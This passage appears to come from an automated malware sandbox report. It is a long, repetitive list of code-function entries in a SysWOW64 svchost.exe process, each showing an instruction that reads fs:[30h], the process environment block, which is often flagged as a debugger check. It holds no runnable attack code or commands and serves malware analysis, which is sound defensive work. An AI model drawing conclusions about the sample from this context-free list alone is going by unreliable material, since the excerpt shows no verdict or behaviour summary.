                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h]2_2_030280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]2_2_030EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]2_2_0302645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]2_2_0305245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]2_2_030BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]2_2_030EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]2_2_030364AB
